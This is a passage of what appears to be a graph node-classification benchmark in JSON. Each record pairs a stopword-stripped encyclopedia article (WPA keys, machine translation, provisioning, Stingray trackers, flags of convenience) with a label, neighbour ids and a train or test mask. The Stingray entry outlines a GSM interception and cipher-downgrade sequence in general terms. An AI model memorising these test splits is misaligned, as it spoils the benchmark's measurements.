relationship example encryption key generated underlying key material using key derivation function example replacement wep wi-fi protected access wpa uses three levels keys master key working key rc4 key master wpa key shared client access point used protocol called temporal key integrity protocol tkip create new working keys frequently enough thwart known attack methods working keys combined longer 48-bit iv form rc4 key packet design mimics wep approach enough allow wpa used first-generation wi-fi network cards implemented portions wep hardware however first-generation access points run wpa another conservative approach employ cipher designed prevent related-key attacks altogether usually incorporating strong key schedule newer version wi-fi protected access wpa2 uses aes block cipher instead rc4 part reason related-key attacks aes unlike rc4 're far practical implement wpa2 key generation functions may provide security many older network cards run wpa2",
    "neighbors": [
      7556,
      262,
      2567,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      10329,
      7643,
      10332,
      8286,
      9697,
      8674,
      229,
      618,
      1898,
      11119,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 3085,
    "label": 0,
    "text": "Interlingual_machine_translation:interlingual machine translation interlingual machine translation one classic approaches machine translation approach source language i.e text translated transformed interlingua i.e. abstract language-independent representation target language generated interlingua within rule-based machine translation paradigm interlingual approach alternative direct approach transfer approach direct approach words translated directly without passing additional representation transfer approach source language transformed abstract less language-specific representation linguistic rules specific language pair transform source language representation abstract target language representation target sentence generated interlingual approach machine translation advantages disadvantages advantages requires fewer components order relate source language target language takes fewer components add new language supports paraphrases input original language allows analysers generators written monolingual system developers handles languages different e.g english arabic obvious disadvantage definition interlingua difficult maybe even impossible wider domain ideal context interlingual machine translation thus multilingual machine translation specific domain first ideas interlingual machine translation appeared 17th century descartes leibniz came theories create dictionaries using universal numerical codes others cave beck athanasius kircher johann joachim becher worked developing unambiguous universal language based principles logic iconographs 1668 john wilkins described interlingua essay towards real character philosophical language 18th 19th centuries many proposals universal international languages developed well known esperanto said applying idea universal language machine translation appear first significant approaches instead work started pairs languages however 1950s 60s researchers cambridge headed margaret masterman leningrad headed nikolai andreev milan silvio ceccato started work area idea discussed extensively israeli philosopher yehoshua bar-hillel 1969 1970s noteworthy research done grenoble researchers attempting translate physics mathematical texts russian french texas similar project metal ongoing russian english early interlingual mt systems also built stanford 1970s roger schank yorick wilks former became basis commercial system transfer funds latter code preserved computer museum boston first interlingual machine translation system 1980s renewed relevance given interlingua-based knowledge-based approaches machine translation general much research going field uniting factor research high-quality translation required abandoning idea requiring total comprehension text instead translation based linguistic knowledge specific domain system would used important research era done distributed language translation dlt utrecht worked modified version esperanto fujitsu system japan method translation interlingua thought way describing analysis text written source language possible convert morphological syntactic semantic even pragmatic characteristics meaning target language interlingua able describe characteristics languages translated instead simply translating one language another sometimes two interlinguas used translation possible one two covers characteristics source language possess characteristics target language translation proceeds converting sentences first language sentences closer target language two stages system may also set second interlingua uses specific vocabulary closer aligned target language could improve translation quality above-mentioned system based idea using linguistic proximity improve translation quality text one original language many structurally similar languages one original analysis principle also used pivot machine translation natural language used bridge two distant languages example case translating english ukrainian using russian intermediate language interlingual machine translation systems two monolingual components analysis source language interlingual generation interlingua target language however necessary distinguish interlingual systems using syntactic methods example systems developed 1970s universities grenoble texas based artificial intelligence 1987 japan research universities southern california carnegie mellon first type system corresponds outlined figure 1. types would approximated diagram figure 4 following resources necessary interlingual machine translation system one problems knowledge-based machine translation systems becomes impossible create databases domains larger specific areas another processing databases computationally expensive one main advantages strategy provides economical way make multilingual translation systems interlingua becomes unnecessary make translation pair pair languages system instead creating formula_1 language pairs formula_2 number languages system necessary make formula_3 pairs formula_2 languages interlingua main disadvantage strategy difficulty creating adequate interlingua abstract independent source target languages languages added translation system different potent interlingua must express possible translation directions another problem difficult extract meaning texts original languages create intermediate representation",
    "neighbors": [
      11529,
      6798,
      7918,
      8688,
      10703,
      10456,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3086,
    "label": 2,
    "text": "Provisioning_(telecommunications):provisioning telecommunications telecommunication provisioning involves process preparing equipping network allow provide new services users national security/emergency preparedness telecommunications services provisioning equates initiation includes altering state existing priority service capability concept network provisioning service mediation mostly used telecommunication industry refers provisioning customer services network elements requires existence networking equipment depends network planning design modern signal infrastructure employing information technology levels possible distinction telecommunications services higher level infrastructure accordingly provisioning configures required systems provides users access data technology resources refers enterprise-level information-resource management involved organizationally cio typically manages provisioning necessarily involving human resources departments cooperating core provisioning process monitors access rights privileges ensure security enterprise resources user privacy secondary responsibility ensures compliance minimizes vulnerability systems penetration abuse tertiary responsibility tries reduce amount custom configuration using boot image control methods radically reduce number different configurations involved discussion provisioning often appears context virtualization orchestration utility computing cloud computing open-configuration concepts projects instance oasis provisioning services technical committee pstc defines xml-based framework exchanging user resource service-provisioning information spml service provisioning markup language managing provisioning allocation identity information system resources within organizations provisioning taken place process sysopping ensures maintenance services expected standards provisioning thus refers setup startup part service operation sysopping ongoing support one type provisioning services assigned customer customer relationship management crm provisioned network element enabling service allows customer actually use service relation service configured crm service network elements necessarily 1:1 relation services enabled one network element e.g microsoft media server mms // service provisioning service mediation device translates service corresponding parameters service one services/parameters network elements involved algorithm used translate system service network services called provisioning logic electronic invoice feeds carriers automatically downloaded directly core telecom expense management tem software immediately conduct audit single line item charge way user support operations center usoc level provisioning software capture circuit number provided carriers bills outside contracted rate exception rule trigger red flag notify pre-established staff member review billing error server provisioning set actions prepare server appropriate systems data software make ready network operation typical tasks provisioning server select server pool available servers load appropriate software operating system device drivers middleware applications appropriately customize configure system software create change boot image server change parameters ip address ip gateway find associated network storage resources sometimes separated resource provisioning audit system auditing system ensure oval compliance limit vulnerability ensure compliance install patches actions restart system load new software makes system ready operation typically internet service provider isp network operations center perform tasks well-defined set parameters example boot image organization approved uses software license many instances boot image create virtual dedicated host many software products available automate provisioning servers services end-user devices examples bmc bladelogic server automation hp server automation ibm tivoli provisioning manager redhat kickstart xcat hp insight cmu etc middleware applications installed either operating system installed afterwards using application service automation tool questions addressed academia provisioning issued many servers needed multi-tier multi-service applications cloud computing servers may provisioned via web user interface application programming interface one unique things cloud computing rapidly easily done monitoring software used trigger automatic provisioning existing resources become heavily stressed short server provisioning configures servers based resource requirements use hardware software component e.g single/dual processor ram hdd raid controller number lan cards applications os etc depends functionality server isp virtualization nos voice processing server redundancy depends availability servers organization critical applications less downtime using cluster servers raid mirroring system service used larger scale centers part avoid additional resource provisioning may done per service several software market server provisioning cobbler hp intelligent provisioning user provisioning refers creation maintenance deactivation user objects user attributes exist one systems directories applications response automated interactive business processes user provisioning software may include one following processes change propagation self-service workflow consolidated user administration delegated user administration federated change control user objects may represent employees contractors vendors partners customers recipients service services may include electronic mail inclusion published user directory access database access network mainframe etc user provisioning type identity management software particularly useful within organizations users may represented multiple objects multiple systems multiple instances on-demand self-service described national institute standards technology nist essential characteristic cloud computing self-service nature cloud computing lets end users obtain remove cloud services―including applications infrastructure supporting applications configuration― without requiring assistance staff member automatic self-servicing may target different application goals constraints e.g deadlines cost well handling different application architectures e.g. bags-of-tasks workflows cloud users obtain cloud services cloud service catalog self-service portal business users obtain configure cloud services means staff productive gives time manage cloud infrastructures however one problem cloud service provisioning instantaneous cloud vm acquired time user may take several minutes acquired vm ready use vm startup time dependent factors image size vm type data center location number vms etc cloud providers different vm startup performance mobile subscriber provisioning refers setting new services gprs mms instant messaging existing subscriber mobile phone network gateways standard internet chat mail services network operator typically sends settings subscriber handset using sms text services html less commonly wap depending mobile operating systems accept general example provisioning data services mobile user using device voice calling may wish switch data services order read emails browse internet mobile device services provisioned thus user able stay connected push emails features smartphone services device management systems benefit end-users incorporating plug play data services supporting whatever device end-user using.. platform automatically detect devices network sending settings immediate continued usability process fully automated keeping history used devices sending settings subscriber devices previously set one method managing mobile updates filter imei/imsi pairs operators report activity 50 over-the-air settings update files per second changed refers delivering mobile content mobile internet mobile phone agnostic features said device may include operating system type versions java version browser version screen form factors audio capabilities language settings plethora characteristics april 2006 estimated 5000 permutations relevant mobile content provisioning facilitates common user experience though delivered widely different handsets getting user customer online beyond user provisioning network provisioning client system must configured process may include many steps depending connection technology question dsl cable fibre etc. possible steps four approaches provisioning internet access",
    "neighbors": [
      4609,
      4236,
      6563,
      7467,
      6703,
      7983,
      1334,
      8122,
      8254,
      3521,
      6856,
      9167,
      2259,
      467,
      2901,
      8792,
      479,
      4194,
      11108,
      9455,
      4979,
      5875,
      5370
    ],
    "mask": "Test"
  },
  {
    "node_id": 3087,
    "label": 1,
    "text": "DataMapper:datamapper datamapper object-relational mapper library written ruby follows active record pattern even though name implies follows data mapper pattern datamapper 1 may achieved total decoupling object database suggested data mapper pattern appears datamapper 2 intended change la virtus library adapted datamapper datamapper 2 project renamed launch released ruby object mapper rom august 2013 features datamapper datamapper designed abstract orm strictly sql based martin fowler enterprise pattern result datamapper adapters built non-sql databases couchdb apache solr webservices salesforce.com",
    "neighbors": [
      3080,
      10090,
      11221,
      8408,
      9467,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 3088,
    "label": 4,
    "text": "Stingray_phone_tracker:stingray phone tracker stingray imsi-catcher controversial cellular phone surveillance device manufactured harris corporation initially developed military intelligence community stingray similar harris devices widespread use local state law enforcement agencies across canada united states united kingdom stingray also become generic name describe kinds devices stingray imsi-catcher passive digital analyzer active cell-site simulator capabilities operating active mode device mimics wireless carrier cell tower order force nearby mobile phones cellular data devices connect stingray family devices mounted vehicles aeroplanes helicopters unmanned aerial vehicles hand-carried versions referred trade name kingfish active mode stingray force compatible cellular device given area disconnect service provider cell site e.g. operated verizon etc establish new connection stingray cases accomplished stingray broadcast pilot signal either stronger made appear stronger pilot signals broadcast legitimate cell sites operating area common function cellular communications protocols cellular device connect cell site offering strongest signal stingrays exploit function means force temporary connections cellular devices within limited area process forcing connections compatible cellular devices given area stingray operator needs determine device desired surveillance target accomplished downloading imsi esn identifying data devices connected stingray context imsi equivalent identifier obtained cellular service provider third-party stingray downloads data directly device using radio waves cases imsi equivalent identifier target device known stingray operator beforehand case operator download imsi equivalent identifier device connects stingray downloaded imsi matches known imsi desired target dragnet end operator proceed conduct specific surveillance operations target device cases imsi equivalent identifier target known stingray operator goal surveillance operation identify one cellular devices used known area example visual surveillance conducted group protestors stingray used download imsi equivalent identifier phone within protest area identifying phones locating tracking operations conducted service providers forced turn account information identifying phone users cellular telephones radio transmitters receivers much like walkie-talkie however cell phone communicates repeater inside nearby cell tower installation installation devices take cell calls geographic area repeat cell installations repeat signals onward destination telephone either radio landline wires radio used also transmit caller voice/data back receiver cell telephone two-way duplex phone conversation exists via interconnections make work correctly system allows automatic increases decreases transmitter power individual cell phone tower repeater minimum transmit power used complete hold call active allows users hear heard continuously conversation goal hold call active use least amount transmitting power mainly conserve batteries efficient tower system sense cell phone coming clearly order cell phone boost transmit power user control boosting may occur split second whole conversation user remote location power boost may continuous addition carrying voice data cell phone also transmits data automatically boosted system detects need encoding transmissions ensures cross talk interference occurs two nearby cell users boosting power however limited design devices maximum setting standard systems high power thus overpowered secret systems using much boosted power take user cell phone overpowered way cell phone indicate change due secret radio programmed hide normal detection ordinary user know cell phone captured via overpowering boosts ways secret capture need overpower person shouting drowns someone whispering boost rf watts power cell telephone system overtake control system—in total even one conversation strategy requires rf power thus simple types secret control power boosting equipment installed anywhere antenna including vehicle perhaps even vehicle move secretly boosted system takes control manipulation possible simple recording voice data total blocking cell phones geographic area stingray used identify track phone compatible cellular data device even device engaged call accessing data services stingray closely resembles portable cellphone tower typically law enforcement officials place stingray vehicle compatible computer software stingray acts cellular tower send signals get specific device connect cell phones programmed connect cellular tower offering best signal phone stingray connect computer system determines strength signal thus distance device vehicle moves another location sends signals connects phone signal strength determined enough locations computer system centralizes phone able find cell phones programmed constantly search strongest signal emitted cell phone towers area course day cell phones connect reconnect multiple towers attempt connect strongest fastest closest signal way designed signals stingray emits far stronger coming surrounding towers reason cell phones vicinity connect stingray regardless cell phone owner ’ knowledge stingray capable locating device interfering device collecting personal data device fbi claimed used identify locate track cellular device stingray collect communications content forward service provider instead device causes disruption service scenario attempt cellular device user place call access data services fail stingray conducting surveillance august 21 2018 senator ron wyden noted harris corporation confirmed stingrays disrupt targeted phone communications additionally noted company claims cell-site simulators include feature detects permits delivery emergency calls 9-1-1 officials admitted office feature independently tested part federal communication commission ’ certification process able confirm feature capable detecting passing-through 9-1-1 emergency communications made people deaf hard hearing speech disabled using real-time text technology way software upgrades stingray similar harris products used intercept gsm communications content transmitted over-the-air target cellular device legitimate service provider cell site stingray way following man-in-the-middle attack 1 simulate cell site force connection target device 2 download target device imsi identifying information 3 conduct gsm active key extraction obtain target device stored encryption key 4 use downloaded identifying information simulate target device over-the-air 5 simulating target device establish connection legitimate cell site authorized provide service target device 6 use encryption key authenticate stingray service provider target device 7 forward signals target device legitimate cell site decrypting recording communications content gsm active key extraction performed stingray step three merits additional explanation gsm phone encrypts communications content using encryption key stored sim card copy stored service provider simulating target device explained man-in-the-middle attack service provider cell site ask stingray believes target device initiate encryption using key stored target device therefore stingray needs method obtain target device stored encryption key else man-in-the-middle attack fail gsm primarily encrypts communications content using a5/1 call encryption cypher 2008 reported gsm phone encryption key obtained using 1,000 worth computer hardware 30 minutes cryptanalysis performed signals encrypted using a5/1 however gsm also supports export weakened variant a5/1 called a5/2 weaker encryption cypher cracked real-time a5/1 a5/2 use different cypher strengths use underlying encryption key stored sim card therefore stingray performs gsm active key extraction step three man-in-the-middle attack follows 1 instruct target device use weaker a5/2 encryption cypher 2 collect a5/2 encrypted signals target device 3 perform cryptanalysis a5/2 signals quickly recover underlying stored encryption key encryption key obtained stingray uses comply encryption request made service provider man-in-the-middle attack rogue base station force unencrypted links supported handset software rogue base station send 'cipher mode settings element see gsm 04.08 chapter 10.5.2.9 phone element clearing one bit marks encryption used cases phone display could indicate use unsafe link user interface software phones interrogate handset radio subsystem use insecure mode display warning indication passive mode stingray operates either digital analyzer receives analyzes signals transmitted cellular devices and/or wireless carrier cell sites radio jamming device transmits signals block communications cellular devices wireless carrier cell sites passive mode meant stingray mimic wireless carrier cell site communicate directly cellular devices stingray test phone used conduct base station surveys process collecting information cell sites including identification numbers signal strength signal coverage areas conducting base station surveys stingray mimics cell phone passively collecting signals transmitted cell-sites area stingray base station survey data used narrow past locations cellular device used conjunction historical cell site location information hcsli obtained wireless carrier hcsli includes list cell sites sectors accessed cellular device date time access made law enforcement often obtain hcsli wireless carriers order determine particular cell phone located past information obtained law enforcement use map cell site locations determine past geographical locations cellular device however signal coverage area given cell site may change according time day weather physical obstructions relation cellular device attempts access service maps cell site coverage areas used law enforcement may also lack precision general matter reasons beneficial use stingray test phone map precise coverage areas cell sites appearing hcsli records typically done time day weather conditions effect hcsli logged using stingray conduct base station surveys manner allows mapping cell site coverage areas accurately match coverage areas effect cellular device used use devices frequently funded grants department homeland security los angeles police department used department homeland security grant 2006 buy stingray regional terrorism investigations however according electronic frontier foundation lapd using investigation imaginable addition federal law enforcement military intelligence agencies stingrays recent years purchased local state law enforcement agencies 2006 harris corporation employees directly conducted wireless surveillance using stingray units behalf palm bay police department — harris campus — response bomb threat middle school search conducted without warrant judicial oversight american civil liberties union commonly referred aclu confirmed local police cell site simulators washington nevada arizona alaska missouri new mexico georgia massachusetts state police cell site simulators oklahoma louisiana pennsylvania delaware local state police cell site simulators california texas minnesota wisconsin michigan illinois indiana tennessee north carolina virginia florida maryland new york 60 police use cell site simulators unknown remaining states however many agencies disclose use stingray technology statistics still potentially under-representation actual number agencies according recent information published american civil liberties union 72 law enforcement agencies 24 states stingray technology 2017 since 2014 numbers increased 42 agencies 17 states 60 following federal agencies united states validated use cell site simulators federal bureau investigation drug enforcement administration us secret service immigration customs enforcement us marshals service bureau alcohol tobacco firearms explosives us army us navy us marine corps us national guard us special command national security agency 60 several court decisions issued legality using stingray without warrant courts ruling warrant required others requiring warrant police vancouver bc canada admitted much speculation across country made use stingray device provided rcmp also stated intended make use devices future two days later statement edmonton police force taken confirming use devices said later mean create called miscommunication privacy international sunday times reported usage stingrays imsi-catchers ireland irish garda síochána ombudsman commission gsoc oversight agency irish police force garda síochána june 10 2015 bbc reported investigation sky news possible false mobile phone towers used london metropolitan police commissioner bernard hogan-howe refused comment february 2015 april 2016 12 companies united kingdom authorized export imsi-catcher devices states including saudi arabia uae turkey critics expressed concern export surveillance technology countries poor human rights records histories abusing surveillance technology increasing use devices largely kept secret court system public 2014 police florida revealed used devices least 200 additional times since 2010 without disclosing courts obtaining warrant one reasons tallahassee police provided pursuing court approval efforts would allegedly violate non-disclosure agreements ndas police sign manufacturer american civil liberties union filed multiple requests public records florida law enforcement agencies use cell phone tracking devices local law enforcement federal government resisted judicial requests information use stingrays refusing turn information heavily censoring june 2014 american civil liberties union published information court regarding extensive use devices local florida police publication united states marshals service seized local police surveillance records bid keep coming court cases police refused disclose information courts citing non-disclosure agreements signed harris corporation fbi defended agreements saying information technology could allow adversaries circumvent aclu said potentially unconstitutional government surveillance scale remain hidden public private corporation desires secrecy certainly concealed judges 2015 santa clara county pulled contract negotiations harris stingray units citing onerous restrictions imposed harris could released public records requests reason exiting negotiations recent years legal scholars public interest advocates legislators several members judiciary strongly criticized use technology law enforcement agencies critics called use devices government agencies warrantless cell phone tracking frequently used without informing court system obtaining warrant electronic frontier foundation called devices “ unconstitutional all-you-can-eat data buffet. ” june 2015 wnyc public radio published podcast daniel rigmaiden stingray device 2016 professor laura moy georgetown university law center filed formal complaint fcc regarding use devices law enforcement agencies taking position devices mimic properties cell phone towers agencies operating violation fcc regulation lack appropriate spectrum licenses number countermeasures stingray devices developed example crypto phones gmsk cryptophone firewalls identify thwart stingray actions alert user imsi capture",
    "neighbors": [
      3495,
      6344,
      1930,
      3115,
      1070,
      7887,
      1169,
      8849,
      8627,
      9233,
      7893,
      10935,
      6170,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 3089,
    "label": 3,
    "text": "OpenZaurus:openzaurus openzaurus defunct embedded operating system sharp zaurus personal mobile tool pda original form project repackaging sharprom zaurus factory supplied kernel root filesystem image order make zaurus os closer needs developer community sharprom altered use bugfixes software additions even removals order make package open openzaurus project revamped completely becoming debian-based built source ground due change direction openzaurus became quite similar embedded debian-based distributions familiar ipaq openzaurus current form facilitates easy method users build custom images efforts openzaurus along embedded linux projects integrated openembedded project provides common framework projects addition building custom openzaurus image using openembedded metadata openzaurus distribution acquired three variations version release april 26 2007 announced openzaurus project future development efforts focus ångström distribution embedded systems",
    "neighbors": [
      11271,
      10760,
      9253,
      11305,
      3626,
      7727,
      56,
      59,
      4673,
      7246,
      7253,
      1110,
      3162,
      607,
      10341,
      3685,
      6763,
      10860,
      2671,
      8315,
      8316,
      8829,
      11388,
      11391,
      2179,
      8837,
      8326,
      10394,
      6301,
      673,
      3745,
      7854,
      3248,
      7857,
      2738,
      4790,
      8907,
      4305,
      2259,
      8423,
      4841,
      6890,
      7913,
      9964,
      7920,
      5363,
      9461,
      6393,
      8957,
      7435,
      4364,
      2321,
      5397,
      4887,
      4383,
      10530,
      7983,
      7483,
      3903,
      7492,
      2375,
      10080,
      2914,
      10599,
      9064,
      7020,
      2925,
      7534,
      9074,
      10127,
      10149,
      439,
      4039,
      5067,
      3542,
      9693,
      485,
      10215,
      495,
      8177
    ],
    "mask": "Test"
  },
  {
    "node_id": 3090,
    "label": 1,
    "text": "Flag_of_convenience:flag convenience flag convenience foc business practice whereby ship owners register merchant ship ship register country ship owners ship flies civil ensign country called flag state term often used pejoratively practice regarded contentious merchant ship required international law registered registry created country ship subject laws country used also ship involved case admiralty law ship owners may elect register ship foreign country enables avoid regulations owners ’ country may example stricter safety standards may also select jurisdiction reduce operating costs bypassing laws protect wages working conditions mariners term flag convenience used since 1950s registry nationality residency requirement ship registration often described open registry panama example offers advantages easier registration often online ability employ cheaper foreign labour furthermore foreign owners pay income taxes modern practice ships registered foreign country began 1920s united states shipowners seeking serve alcohol passengers prohibition registered ships panama owners soon began perceive advantages terms avoiding increased regulations rising labor costs continued register ships panama even prohibition ended use open registries steadily increased 1968 liberia grew surpass united kingdom world largest ship register half world merchant ships registered open registries almost 40 entire world fleet terms deadweight tonnage registered panama liberia marshall islands 2006 20 high-seas fishing vessels registered states connected according ihs markit march 2017 panama 8,052 ships registry singapore 3,574 ships liberia 3,277 ships marshall islands 3,244 ships hong kong 2,594 ships open registries criticised mainly trade union organisations based developed countries especially europe one criticism shipowners want hide ownership may select flag-of-convenience jurisdiction enables legally anonymous ships flags convenience found engaging crime offer substandard working conditions negatively impact environment primarily illegal unreported unregulated fishing shipowners may select jurisdiction measurement rules reduce certified grt size ship reduce subsequent port call dock dues consideration carnival cruise line changed flag rms empress canada 1972 panama 2011 cunard cruise line registered ships bermuda besides considerations enabled ship captains marry couples sea weddings sea described lucrative market thirteen flag states found international shipping organisations substandard regulations hand maritime industry practitioners seafarers countries contend natural product globalisation supporters practice however point economic regulatory advantages increased freedom choosing employees international labour pool ship owners developed countries use practice competitive global environment ships thirteen flags convenience targeted special enforcement countries visit ports countries called port state control international law requires every merchant ship registered country country ship registered flag state flag state gives ship right fly civil ensign ship operates laws flag state laws used ship involved admiralty case ship flag state exercises regulatory control vessel required inspect regularly certify ship equipment crew issue safety pollution prevention documents organization actually registers ship known registry registries may governmental private agencies reasons choosing open register varied include tax avoidance ability avoid national labor environmental regulations ability hire crews lower-wage countries national closed registries typically require ship owned constructed national interests least partially crewed citizens conversely open registries frequently offer on-line registration questions asked use flags convenience lowers registration maintenance costs turn reduces overall transportation costs accumulated advantages significant example 1999 28 american company sealand fleet 63 ships foreign-flagged saving company us 3.5 million per ship every year environmental disaster caused 1978 sinking flew liberian flag spurred creation new type maritime enforcement resulting strong political public outcry amoco cadiz sinking fourteen european nations signed 1982 paris memorandum understanding port state control paris mou port state control ships international trade became subject inspection states visit addition shipboard living working conditions inspections cover items concerning safety life sea prevention pollution ships cases port state inspection uncovers problems ship port state may take actions including detaining ship 2015 member states paris mou conducted 17,858 inspections deficiencies resulted 595 detained vessels 11 banned member states tokyo memorandum understanding conducted 17,269 ship inspections 2015 recording 83,606 deficiencies resulted 1,153 detentions principle genuine link ship owners flag state dates back 1958 article 5 1 geneva convention high seas also required state must effectively exercise jurisdiction control administrative technical social matters ships flying flag principle repeated article 91 1982 treaty called united nations convention law sea often referred unclos 1986 united nations conference trade development attempted solidify genuine link concept united nations convention conditions registration ships convention registration ships would require flag state linked ships either economic stake ownership ships providing mariners crew ships come force 1986 treaty requires 40 signatories whose combined tonnage exceeds 25 world total 14 countries signed treaty merchant ships used false flags tactic evade enemy warships since antiquity examples found early roman era middle ages following american revolutionary war merchantmen flying flag fledgling united states quickly found offered little protection attack barbary pirates – many responded seeking transfer registry back great britain use false flags frequently used british napoleonic wars united states war 1812 mid-19th century slave ships flew various flags avoid searched british anti-slavery fleets belen quezada august 1919 first foreign ship re-registered panamanian registry employed running illegal alcohol canada united states prohibition modern practice registering ships foreign countries gain economic advantage originated united states era world war though term flag convenience come use 1950s 1915 1922 several laws passed united states strengthen united states merchant marine provide safeguards mariners period u.s.-flagged ships became subject regular inspections undertaken american bureau shipping also time robert lafollette seamen act 1915 described magna carta sailors rights seamen act regulated mariners working hours payment established baseline requirements shipboard food also reduced penalties disobedience abolished practice imprisoning sailors offense desertion another aspect seamen act enforcement safety standards requirements lifeboats number qualified able seamen board officers seamen able speak language laws put u.s.-flagged vessels economic disadvantage countries lacking safeguards ships started re-registered panama open registry 1919 addition sidestepping seamen act panamanian-flagged ships early period paid sailors japanese wage scale much lower western merchant powers early phase world war ii transfer american-owned ships panama registry sanctioned united states government could used deliver materials britain without dragging united states neutral unintentionally war liberian open registry founded 1948 brainchild edward stettinius franklin d. roosevelt secretary state world war ii stettinius created corporate structure included liberia corporation joint-venture government liberia corporation structured one-fourth revenue would go liberian government another 10 went fund social programs liberia remainder returned stettinius corporation liberian registry created time panama registry becoming less attractive several reasons including unpopularity u.s. labor movement european shipping concerns political unrest panama increases fees regulations 11 march 1949 greek shipping magnate stavros niarchos registered first ship liberian flag world peace stettinius died 1949 ownership registry passed international bank washington led general george olmsted within 18 years liberia grew surpass united kingdom world largest register due liberia 1989 1999 civil wars registry eventually fell second panama flag convenience maritime funds continued supply 70 total government revenue civil war 1990 liberia joined republic marshall islands develop new maritime corporate program resulting company international registries formed parent company 1993 bought management taking liberian government americo-liberian warlord charles taylor signed new registry contract liberian international ship corporate registry commonly known liscr liscr one legal sources income taylor regime liberia registry operated virginia united states open registries panama liberia marshall islands accounted almost 40 entire world fleet terms deadweight tonnage year top ten flags convenience registered 55 world deadweight tonnage including 61 bulk carriers 56 oil tankers counteract class hopping 2009 iacs established transfer class agreement toca international transport workers federation itf maintains list registries considers flags convenience foc registries developing list itf considers ability willingness flag state enforce international minimum social standards vessels degree ratification enforcement ilo conventions recommendations safety environmental record list includes 35 countries panama liberia marshall islands world three largest registries terms deadweight tonnage dwt three organizations registered 11,636 ships total 39 world shipborne carrying capacity panama dominates scene 8,065 ships accounting almost 23 world dwt three marshall islands 1,265 registered ships greatest rate dwt increase 2009 increasing tonnage almost 15 bahamian flag ranks sixth worldwide behind hong kong greek registries similar size marshallese flag convenience 200 ships carrying capacity lower malta ninth position worldwide 100 ships bahamas capacity representing 4 world fleet 12 growth year eleventh position cyprus registered 1,016 ships 2009 2.6 world tonnage remaining top 11 flags convenience antigua barbuda 20 bermuda 22 saint vincent grenadines 26 french international ship register fis number 27 bermuda fis fewer 200 ships apiece large average bermudan ship average fis ship way reference average capacity ships u.s. u.k. registers respectively registries antigua barbuda saint vincent grenadines 1,000 ships average capacity respectively remaining flags convenience listed itf account less 1 world dwt half world merchant ships measured tonnage registered flags convenience number common threads found criticisms flag convenience system one flag states insufficient regulations regulations poorly enforced another many cases flag state identify shipowner much less hold owner civilly criminally responsible ship actions result lack flag state control flags convenience criticized grounds enabling tax avoidance providing environment conducting criminal activities supporting terrorism providing poor working conditions seafarers adverse effect environment david cockroft former general secretary itf says panama largest maritime register followed liberia landlocked bolivia also major registry mongolia also registers based countries example panama consulates manage documentation collect registration fees liberia registry managed company virginia bahamas city london ship beneficial owner legally financially responsible ship activities number reasons justifiable suspicious shipowners wish conceal ownership may use number strategies achieve goal jurisidictions permit actual owners may establish shell corporations legal owners ships making difficult impossible track beneficial owner ship 2004 report un secretary general consultative group flag state implementation reported easy comparatively inexpensive establish complex web corporate entities provide effective cover identities beneficial owners want known according 2003 report organisation economic co-operation development oecd report entitled ownership control ships corporate structures often multi-layered spread across numerous jurisdictions make beneficial owner almost impenetrable law enforcement officials taxation report concludes regardless reasons cloak anonymity made available provided also assist may wish remain hidden engage illegal criminal activities including terrorists oecd report concludes use bearer shares perhaps single important perhaps widely used mechanism protect anonymity ship beneficial owner physically possessing bearer share accords ownership corporation requirement reporting transfer bearer shares every jurisdiction requires serial numbers even recorded two similar techniques provide anonymity ship beneficial owner nominee shareholders nominee directors jurisdictions require shareholder identities reported loophole may exist beneficial owner may appoint nominee shareholder nominee legally compelled reveal identity beneficial owner corporations required least one director however many jurisdictions allow nominee director nominee director name would appear corporate paperwork place beneficial owners like nominee shareholders jurisdictions compel nominee director divulge identity beneficial owners hurdle jurisdictions allow corporation named director flag convenience ships long linked crime high seas example 1982 honduras shut open registry operations enabled illegal traffic kinds given honduras bad name ships registered cambodia shipping corporation csc found smuggling drugs cigarettes europe breaking iraq oil embargo engaging human trafficking prostitution europe asia response activities 2000 ahamd yahya cambodian ministry public works transport told industry publication fairplay n't know care owns ships whether 're 'white 'black business ... concern less two years later french forces seized cambodian-flagged greek-owned mv winner cocaine smuggling shortly seizure cambodian prime minister hun sen closed registry foreign ships cambodia canceled contract csc shortly thereafter north korean flag convenience also garnered significant scrutiny 2003 north korean freighter pong su reflagged tuvalu middle voyage shortly seized australian authorities smuggling heroin country year thirteen nations began monitoring vessels north korean flag illicit cargos like drugs missiles nuclear weapon fuel accompanying material ilo maritime labour convention 2006 international labour organization estimated time approximately 1,200,000 working seafarers across world document goes say working aboard ships flagged states exercise effective jurisdiction control ships seafarers often work unacceptable conditions detriment well-being health safety safety ships work international transport workers federation goes stating flags convenience provide means avoiding labor regulation country ownership become vehicle paying low wages forcing long hours work unsafe working conditions since foc ships real nationality beyond reach single national seafarers trade union also say ships low safety standards construction requirements enforce safety standards minimum social standards trade union rights seafarers frequently fail pay crews poor safety records engage practices abandoning crewmen distant ports flag convenience ships involved highest-profile oil spills history maltese-flagged bahamian-flagged marshallese-flagged deepwater horizon liberian-flagged ss torrey canyon common environmental criticism face regards illegal fishing critics flag convenience system argue many foc flag states lack resources properly monitor control vessels environmental justice foundation ejf contends illegal unreported unregulated fishing iuu vessels use flags convenience avoid fisheries regulations controls flags convenience help reduce operating costs associated illegal fishing methods help illegal operators avoid prosecution hide beneficial ownership result flags convenience perpetuate iuu fishing extensive environmental social economic impacts particularly developing countries ejf campaigning end granting flags convenience fishing vessels effective measure combat iuu fishing according franz fischler european union fisheries commissioner international regulations maritime industry promulgated agencies united nations particularly international maritime organization international labour organization flag states adopt regulations ships ratifying individual treaties one common criticism flag convenience countries allow shipowners avoid regulations ratifying important treaties failing enforce international chamber shipping ics issues annual report entitled shipping industry flag state performance table identifying six core conventions representing minimum level maritime regulation viewpoint shipowners solas marpol 66 stcw mlc clc/fund92 35 flag convenience countries listed itf ratified stcw convention concerning standards training certification watchkeeping seafarers 19 ratified six however least fourteen listed countries ratified remaining five conventions put context 60 flag states ratified six conventions including china united states america safety life sea solas load line 66 conventions focus shipboard safety issues originally developed response sinking rms titanic solas sets regulations lifeboats emergency equipment safety procedures including continuous radio watches updated include regulations ship construction fire protection systems life-saving appliances radio communications safety navigation management safe operation ships safety security concerns 66 sets standards minimum buoyancy hull stress ship fittings well establishing navigational 